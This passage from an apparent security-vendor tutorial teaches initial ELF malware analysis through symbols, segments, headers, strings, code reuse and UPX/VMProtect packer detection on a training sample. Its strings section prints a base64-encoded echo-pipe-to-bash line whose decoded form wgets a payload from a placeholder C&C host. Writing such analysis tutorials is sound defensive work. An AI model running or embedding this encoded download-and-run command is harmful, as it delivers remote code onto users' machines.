<img loading="lazy" width="1237" height="687" class="aligncenter size-full wp-image-11689 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png 1237w, https://www.intezer.com/wp-content/uploads/2020/08/4-300x167.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/4-1024x569.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/4-768x427.png 768w" data-lazy-sizes="(max-width: 1237px) 100vw, 1237px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1237" height="687" class="aligncenter size-full wp-image-11689" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4.png 1237w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4-300x167.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4-1024x569.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/4-768x427.png 768w " sizes="(max-width: 1237px) 100vw, 1237px" /></noscript></p>
<p>We can also observe the functions declared in the file’s source code, together with the libc functions it uses. The libc functions are present in both the <strong>.dynsym</strong> and <strong>.symtab</strong> tables, which is why each of them is listed twice.</p>
<p><strong>readelf -s training-sample | grep FILE</strong><br />
<img loading="lazy" width="1015" height="118" class="aligncenter size-full wp-image-11691 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png 1015w, https://www.intezer.com/wp-content/uploads/2020/08/5-300x35.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/5-768x89.png 768w" data-lazy-sizes="(max-width: 1015px) 100vw, 1015px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1015" height="118" class="aligncenter size-full wp-image-11691" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5.png 1015w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5-300x35.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/5-768x89.png 768w " sizes="(max-width: 1015px) 100vw, 1015px" /></noscript></p>
<p>The source files compiled into the binary are our source code (<strong>training_sample.c</strong>) and the <strong>crtstuff.c</strong> file. The <strong>crtstuff.c</strong> source code is compiled into the binary by default. It contains functions that run before and after the file’s main logic (<strong>register_tm_clones</strong>, <strong>deregister_tm_clones</strong>, and <strong>frame_dummy</strong>, for example).</p>
<p><strong>Bottom Line</strong><br />
By interpreting the file’s symbols, you can extract the marked functions and variables from the compiled training sample’s source code:</p>
<p><img loading="lazy" width="687" height="608" class="aligncenter size-full wp-image-11692 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png 687w, https://www.intezer.com/wp-content/uploads/2020/08/6-300x266.png 300w" data-lazy-sizes="(max-width: 687px) 100vw, 687px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="687" height="608" class="aligncenter size-full wp-image-11692" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6.png 687w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/6-300x266.png 300w " sizes="(max-width: 687px) 100vw, 687px" /></noscript></p>
<p><a href="https://www.intezer.com/blog/elf/executable-linkable-format-101-part-2-symbols/" target="_blank" rel="noopener noreferrer nofollow">Browse here</a> for more context about symbols.</p>
<p><strong style="font-size: 20px;">Segments and Sections</strong><br />
<strong>Definition and how they can help us:</strong><br />
Segments, also known as program headers, describe the binary’s memory layout and are necessary for execution. In some cases, anomalies in the structure of the segments table can help us determine whether the binary is packed or has been self-modified (by a file infector, for instance).</p>
<p>Segments can be divided into sections for linking and debugging purposes. Sections complement the program headers and are not necessary for the file’s execution. Symbols are usually retrieved via section information, and unique section names can help us identify different compilation methods.</p>
<p><strong>In practice:</strong><br />
Let’s review the training sample segments. Run <strong>readelf -l training-sample</strong>:</p>
<p><img loading="lazy" width="1054" height="1074" class="aligncenter size-full wp-image-11693 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png 1054w, https://www.intezer.com/wp-content/uploads/2020/08/7-294x300.png 294w, https://www.intezer.com/wp-content/uploads/2020/08/7-1005x1024.png 1005w, https://www.intezer.com/wp-content/uploads/2020/08/7-768x783.png 768w, https://www.intezer.com/wp-content/uploads/2020/08/7-50x50.png 50w, https://www.intezer.com/wp-content/uploads/2020/08/7-65x65.png 65w, https://www.intezer.com/wp-content/uploads/2020/08/7-66x66.png 66w, https://www.intezer.com/wp-content/uploads/2020/08/7-60x60.png 60w" data-lazy-sizes="(max-width: 1054px) 100vw, 1054px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1054" height="1074" class="aligncenter size-full wp-image-11693" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7.png 1054w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-294x300.png 294w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-1005x1024.png 1005w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-768x783.png 768w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-50x50.png 50w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-65x65.png 65w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-66x66.png 66w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/7-60x60.png 60w " sizes="(max-width: 1054px) 100vw, 1054px" /></noscript></p>
<p>There are 9 program headers (segments) in the training sample. Each segment type describes a different component of the binary. We will focus on the <strong>PT_LOAD</strong> segment.</p>
<p>A <strong>PT_LOAD</strong> segment describes a part of the file that is loaded into memory. Therefore, an executable file should always have at least one <strong>PT_LOAD</strong> segment. In the screenshot above you will see that the training sample contains 2 <strong>PT_LOAD</strong> segments, each with different flags:</p>
<ol style="color: #627d98;">
<li><strong>RE (read and execute) flags:</strong> This is the <strong>PT_LOAD</strong> segment that describes the executable code. The file’s entrypoint should be located inside this segment.</li>
<li><strong>RW (read and write) flags:</strong> This is the <strong>PT_LOAD</strong> segment that contains the file’s global variables and dynamic linking information.</li>
</ol>
<p>The segments output also gives us a section-to-segment mapping, listed in the same order as the segments table. Notice that the <strong>.text</strong> section, which contains the executable code instructions, is mapped to the <strong>PT_LOAD R E</strong> segment.</p>
<p>The segments table structure of the training sample is an example of a “normal” structure.<br />
If the file was packed or self-modified, we would see the table structured differently.</p>
<div style="margin-top: 15px; color: #627d98;">This is an example of a segments table of a packed file:</div>
<p><img loading="lazy" width="1020" height="254" class="aligncenter size-full wp-image-11694 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png 1020w, https://www.intezer.com/wp-content/uploads/2020/08/8-300x75.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/8-768x191.png 768w" data-lazy-sizes="(max-width: 1020px) 100vw, 1020px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1020" height="254" class="aligncenter size-full wp-image-11694" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8.png 1020w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8-300x75.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/8-768x191.png 768w " sizes="(max-width: 1020px) 100vw, 1020px" /></noscript></p>
<p>The table contains only 3 segments: 2 <strong>PT_LOAD</strong> segments and a <strong>PT_GNU_STACK</strong>. The existence of <strong>PT_GNU_STACK</strong> indicates to the linker whether the file needs an executable stack (this is also why its size is zero). This is not a typical structure for an ELF program headers table.</p>
<p><strong>Bottom Line</strong></p>
<ul>
<li>Segments:<br />
Anomalies in a file’s segment table can be:
<ol style="color: #627d98;">
<li><strong>Segment types and count:</strong> The file contains only <strong>PT_LOAD</strong> segments (and <strong>PT_GNU_STACK</strong>).</li>
<li><strong>Flags:</strong> The file contains a segment that has all 3 flags (RWE). We will use these anomalies in the packers section.</li>
</ol>
</li>
<li>Sections: We will review examples of unique section names in the packers and interpreter sections.</li>
</ul>
<p>Browse here for more information about <a href="https://www.intezer.com/blog/research/executable-linkable-format-101-part1-sections-segments/" target="_blank" rel="noopener noreferrer">ELF segments</a> and sections.</p>
<p><strong>Note: </strong><br />
Malware developers often strip or tamper with a file’s symbols and/or sections to make it harder for researchers to analyze the file. This also makes the binary nearly impossible to debug.</p>
<p>The following is a method a developer might use to strip a file’s symbols:</p>
<ol style="color: #627d98;">
<li>Run <strong>objcopy -S training-sample training-sample-stripped</strong></li>
<li>Run <strong>readelf -s training-sample-stripped</strong> and you will see there is only a dynamic symbol table.</li>
</ol>
<p>Strip utilities may also leave the sections in place but patch the fields in the ELF header that describe them (<strong>e_shoff</strong>: the offset of the section header table, and <strong>e_shnum</strong>: the number of section headers). As a result, the binary will be reported as having no sections.</p>
<p><strong style="font-size: 20px;">ELF Header</strong><br />
The ELF header contains general data about the binary, such as its entry point and the location of the program headers table. Most of this information is not valuable during initial analysis, but the file’s architecture tells us which machine the file is designed to run on, in case we want to run it.</p>
<p>Let’s run <strong>readelf -h training-sample</strong> in order to view the sample’s header info:</p>
<p><img loading="lazy" width="924" height="363" class="aligncenter size-full wp-image-11695 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png" alt="intezer" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png 924w, https://www.intezer.com/wp-content/uploads/2020/08/9-300x118.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/9-768x302.png 768w" data-lazy-sizes="(max-width: 924px) 100vw, 924px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="924" height="363" class="aligncenter size-full wp-image-11695" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png" alt="intezer" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9.png 924w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9-300x118.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/9-768x302.png 768w " sizes="(max-width: 924px) 100vw, 924px" /></noscript></p>
<p>There are several advanced malware techniques that leverage the ELF header’s structure.</p>
<p>If you would like to learn more about this topic, watch <a href="https://www.youtube.com/watch?v=adYOSO0tn9M&amp;feature=emb_title" target="_blank" rel="noopener noreferrer nofollow">ELF Crafting</a> presented by Nacho Sanmillan at r2con.</p>
<p><strong style="font-size: 20px;">File’s Output</strong><br />
Simply running the file on your VM can always be useful. If the file presents an output, it might immediately help us to determine what it is.</p>
<p><u>Tip</u>: Before running the file, make sure you have saved a clean snapshot of your VM and that the VM is isolated from your network: as the decoded command below shows, the sample tries to reach a remote host.</p>
<p><strong style="font-size: 20px;">Strings</strong><br />
String extraction is a classic and powerful method for gathering information about a binary. Let’s run the strings command on our file and save the output to a text file for convenience:<br />
<strong>strings training-sample &gt; str.txt</strong></p>
<p>When we review the strings, we will see string literals from the code, together with the symbols and other strings related to the file’s format, such as section names and the requested interpreter.</p>
<p>Like in PE analysis, we can search for indicative strings such as network related strings, encoded strings (such as base64 or hex), paths, commands, and other unique key words that might help us understand more about the file.</p>
<p>In the training file, the <strong>echo</strong> command line that pipes a <strong>base64</strong>-encoded string through <strong>base64 -d</strong> and into <strong>bash</strong> immediately stands out:</p>
<p><strong>echo d2dldCBodHRwOi8vc29tZW5vbmV4aXRpbmdjbmNbLl1jb20vbWFsd2FyZS5hcHA=|base64 -d |bash;</strong></p>
<p>If we decode the base64 string, we will receive the following command:</p>
<p><strong>wget http://somenonexitingcnc[.]com/malware.app</strong></p>
<p>We can assume the file drops (downloads) a payload from a remote C&amp;C server.</p>
<p><strong>String Reuse</strong><br />
<a href="https://analyze.intezer.com/" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a> is a useful tool for string extraction. It reduces analysis effort by revealing whether certain strings have been seen before in other files. In the case of an unknown malware, filtering out the common strings helps us focus on the file’s unique strings.</p>
<p><u>For example</u>:<br />
Lazarus’s <a href="https://analyze.intezer.com/files/0a7e7f99dd778cef86050d4ff436f209bd894ebb63faeb16ec0a92876ab81094" target="_blank" rel="noopener noreferrer nofollow">ManusCrypt</a> ELF version contains some of the same strings found in its PE version, which was previously reported by the U.S. government:</p>
<p><a href="https://analyze.intezer.com/files/0a7e7f99dd778cef86050d4ff436f209bd894ebb63faeb16ec0a92876ab81094" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" class="aligncenter wp-image-11696 size-full jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png" data-slb-group="post-images" alt="intezer" width="1323" height="509" data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png 1323w, https://www.intezer.com/wp-content/uploads/2020/08/10-300x115.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/10-1024x394.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/10-768x295.png 768w" data-lazy-sizes="(max-width: 1323px) 100vw, 1323px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" class="aligncenter wp-image-11696 size-full" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png" alt="intezer" width="1323" height="509" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10.png 1323w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10-300x115.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10-1024x394.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/10-768x295.png 768w " sizes="(max-width: 1323px) 100vw, 1323px" /></noscript></a></p>
<p>You can easily browse the PE version to compare the two files using the related samples in Intezer Analyze:</p>
<p><a href="https://analyze.intezer.com/files/0a7e7f99dd778cef86050d4ff436f209bd894ebb63faeb16ec0a92876ab81094" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" width="1076" height="341" class="aligncenter size-full wp-image-11714 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png 1076w, https://www.intezer.com/wp-content/uploads/2020/08/11-300x95.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/11-1024x325.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/11-768x243.png 768w" data-lazy-sizes="(max-width: 1076px) 100vw, 1076px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1076" height="341" class="aligncenter size-full wp-image-11714" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11.png 1076w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11-300x95.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11-1024x325.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/11-768x243.png 768w " sizes="(max-width: 1076px) 100vw, 1076px" /></noscript></a></p>
<p><strong style="font-size: 20px;">Code Reuse</strong><br />
Examining code reuse in <a href="https://analyze.intezer.com/" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a> can be a great starting point for initial analysis. It can expedite analysis time by disclosing where certain code has been used before in other files.</p>
<p><u>For example</u>:<br />
This <a href="https://analyze.intezer.com/files/a8b069ef9d76cd42e873c6e8ded9db8c17d9d0ce234b5e7c9a126b4d514c6f72" target="_blank" rel="noopener noreferrer nofollow">Rekoobe sample</a> had 0 detections in VirusTotal. Upon uploading it to Intezer Analyze, we receive a clear verdict (malicious) and classification (Rekoobe) based on code reuse from previous samples.</p>
<p><a href="https://analyze.intezer.com/files/a8b069ef9d76cd42e873c6e8ded9db8c17d9d0ce234b5e7c9a126b4d514c6f72" target="_blank" rel="noopener noreferrer nofollow"><img loading="lazy" width="1534" height="556" class="aligncenter size-full wp-image-11715 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png" data-slb-group="post-images" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png 1534w, https://www.intezer.com/wp-content/uploads/2020/08/12-300x109.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/12-1024x371.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/12-768x278.png 768w" data-lazy-sizes="(max-width: 1534px) 100vw, 1534px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1534" height="556" class="aligncenter size-full wp-image-11715" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12.png 1534w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12-300x109.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12-1024x371.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/12-768x278.png 768w " sizes="(max-width: 1534px) 100vw, 1534px" /></noscript></a></p>
<p><strong style="font-size: 20px;">Packers</strong><br />
Unlike PE malware, where it’s common for known payloads to be packed with evasive and constantly changing packers (polymorphic custom packers), this is rare in ELF malware. One explanation might be that the ongoing ‘cat-and-mouse’ game between security companies and malware developers is still in its infancy, as companies are only now starting to embrace Linux-focused detection and protection platforms for their systems.</p>
<p>However, the well-known UPX packer is heavily used by ELF malware developers. In this section we will review ELF packers, determine how we can identify whether a file is packed, and understand what our next steps are if the file is indeed packed. We will focus on UPX and VMProtect, as they are the most commonly used packers.</p>
<p><strong>Vanilla UPX</strong><br />
Files packed with Vanilla UPX are easy to detect and unpack.<br />
Let’s try it ourselves by packing the training file with UPX (<a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/training-sample-static-packed" target="_blank" rel="noopener noreferrer nofollow">you can download the compiled file from here</a>):</p>
<ol style="color: #627d98;">
<li>First, we must make the file larger by compiling it as a statically linked binary (UPX has a minimum file size and this file is currently too small). Run: <strong>gcc -static training_sample.c -o training-sample-static</strong></li>
</ol>
<ol start="2">
<li style="color: #627d98;">Run: <strong>upx -9 training-sample-static -o training-sample-static-packed</strong></li>
</ol>
<p>Run <strong>readelf -a training-sample-static-packed</strong> to retrieve the file’s data. You will notice that there are only the ELF header and the segments table. These are necessary for the file to run.</p>
<p><img loading="lazy" width="1461" height="1199" class="aligncenter size-full wp-image-11716 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png 1461w, https://www.intezer.com/wp-content/uploads/2020/08/13-300x246.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/13-1024x840.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/13-768x630.png 768w" data-lazy-sizes="(max-width: 1461px) 100vw, 1461px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1461" height="1199" class="aligncenter size-full wp-image-11716" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13.png 1461w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13-300x246.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13-1024x840.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/13-768x630.png 768w " sizes="(max-width: 1461px) 100vw, 1461px" /></noscript></p>
<p>The segment table contains only <strong>PT_LOAD</strong> and <strong>PT_GNU_STACK</strong> segments. This is an anomaly in the segment table’s structure that might indicate the file is packed.</p>
<p>Let’s run the strings command on the file. Notice that most of the strings are gibberish; however, there is an indication that the file is packed with UPX.</p>
<p><img loading="lazy" width="1057" height="172" class="aligncenter size-full wp-image-11717 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png 1057w, https://www.intezer.com/wp-content/uploads/2020/08/14-300x49.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/14-1024x167.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/14-768x125.png 768w" data-lazy-sizes="(max-width: 1057px) 100vw, 1057px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1057" height="172" class="aligncenter size-full wp-image-11717" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14.png 1057w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14-300x49.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14-1024x167.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/14-768x125.png 768w " sizes="(max-width: 1057px) 100vw, 1057px" /></noscript></p>
<p>The strings, together with the file’s table structure, indicate that the file is probably packed with UPX.</p>
<p>Let’s use the <a href="http://ntinfo.biz/index.html" target="_blank" rel="noopener noreferrer nofollow">Detect It Easy</a> (DIE) tool. DIE is a signature-based tool that detects a file’s compiler, linker, packer, and more. Open the file with this tool and you will see it immediately identifies the file as UPX packed.</p>
<p><img loading="lazy" width="625" height="379" class="aligncenter size-full wp-image-11718 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png 625w, https://www.intezer.com/wp-content/uploads/2020/08/15-300x182.png 300w" data-lazy-sizes="(max-width: 625px) 100vw, 625px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="625" height="379" class="aligncenter size-full wp-image-11718" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15.png 625w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/15-300x182.png 300w " sizes="(max-width: 625px) 100vw, 625px" /></noscript></p>
<p>Now, let’s check out DIE’s <a href="https://reverseengineering.stackexchange.com/questions/21555/what-is-an-entropy-graph/21558" target="_blank" rel="noopener noreferrer nofollow">Entropy</a> feature:</p>
<p><img loading="lazy" width="725" height="480" class="aligncenter size-full wp-image-11719 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png 725w, https://www.intezer.com/wp-content/uploads/2020/08/16-300x199.png 300w" data-lazy-sizes="(max-width: 725px) 100vw, 725px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="725" height="480" class="aligncenter size-full wp-image-11719" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16.png 725w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/16-300x199.png 300w " sizes="(max-width: 725px) 100vw, 725px" /></noscript></p>
<p>If a file is packed with Vanilla UPX, unpack it by running<br />
<strong>upx -d training-sample-static-packed</strong> and then continue your analysis using the unpacked file.</p>
<p><strong>Custom UPX</strong><br />
Since UPX is open source, it’s easy to modify and add advanced layers to the packing process. In order to detect files that are packed with custom UPX, we can use the same detection methods used for Vanilla UPX. However, there might not always be an indicative string which can disclose that a file is probably packed with UPX. For example, <a href="https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers" target="_blank" rel="noopener noreferrer nofollow">Rocke</a> uses LSD! instead of the original UPX! header. Although it’s one of the simplest tricks in Custom UPX, it evades static parsers rather easily.</p>
<p><img loading="lazy" width="1063" height="201" class="aligncenter size-full wp-image-11720 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png 1063w, https://www.intezer.com/wp-content/uploads/2020/08/17-300x57.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/17-1024x194.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/17-768x145.png 768w" data-lazy-sizes="(max-width: 1063px) 100vw, 1063px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1063" height="201" class="aligncenter size-full wp-image-11720" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17.png 1063w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17-300x57.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17-1024x194.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/17-768x145.png 768w " sizes="(max-width: 1063px) 100vw, 1063px" /></noscript></p>
<p>Code reuse can also simplify packer detection. Check out this <a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/modified_upx_sample" target="_blank" rel="noopener noreferrer nofollow">modified UPX example</a>. It contains no string signatures but if we open it in <a href="https://analyze.intezer.com/files/3d1650fe601e705d4bb2c4d197eeb0fb56fba0479df98dbd159dcbd15ee12f7e" target="_blank" rel="noopener noreferrer nofollow">Intezer Analyze</a> it’s clear the file is packed with modified UPX.</p>
<p>Files packed with modified UPX will most likely not unpack with the <strong>upx -d</strong> command. In this case, we should proceed to dynamic analysis.</p>
<p><strong>VMprotect</strong><br />
VMprotect packer is a popular packing choice for PE files and it also has a packing solution for ELF files.</p>
<p>You can try it yourself by using the demo version. Execute the following commands to download VMprotect onto your VM and run it (<a href="https://github.com/intezer/ELF-Malware-Analysis-101/raw/master/Part-2-Initial-Analysis/Article-samples/training-sample.vmp.app" target="_blank" rel="noopener noreferrer nofollow">download the compiled file from here</a>):</p>
<p><strong>wget http://vmpsoft.com/files/VMProtectDemo_x64.tar.gz<br />
mkdir VMprotect<br />
tar -xf VMProtectDemo_x64.tar.gz -C VMprotect<br />
cp training-sample training-sample.app<br />
cd VMprotect<br />
./vmprotect_gui</strong></p>
<p>The VMprotect GUI should open. Choose “Open..” and then select “training-sample.app”.</p>
<p>Take a look at “VM Segment” in the “Options” setting. This “.vmp” field can be changed to any value the user decides. We will change it to “cat”. Next, click on the play button.</p>
<p><img loading="lazy" width="1269" height="573" class="aligncenter size-full wp-image-11721 jetpack-lazy-image" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png" alt data-lazy-srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png 1269w, https://www.intezer.com/wp-content/uploads/2020/08/18-300x135.png 300w, https://www.intezer.com/wp-content/uploads/2020/08/18-1024x462.png 1024w, https://www.intezer.com/wp-content/uploads/2020/08/18-768x347.png 768w" data-lazy-sizes="(max-width: 1269px) 100vw, 1269px" data-lazy-src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png?is-pending-load=1" srcset=""><noscript><img loading="lazy" width="1269" height="573" class="aligncenter size-full wp-image-11721" src="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png" alt="" srcset="https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18.png 1269w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18-300x135.png 300w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18-1024x462.png 1024w , https://149520725.v2.pressablecdn.com/wp-content/uploads/2020/08/18-768x347.png 768w " sizes="(max-width: 1269px) 100vw, 1269px" /></noscript></p>
<p>The program has created a packed sample on your working directory. Run <strong>readelf -l training-sample.vmp.app</strong> to view the packed file’s segments.</p>
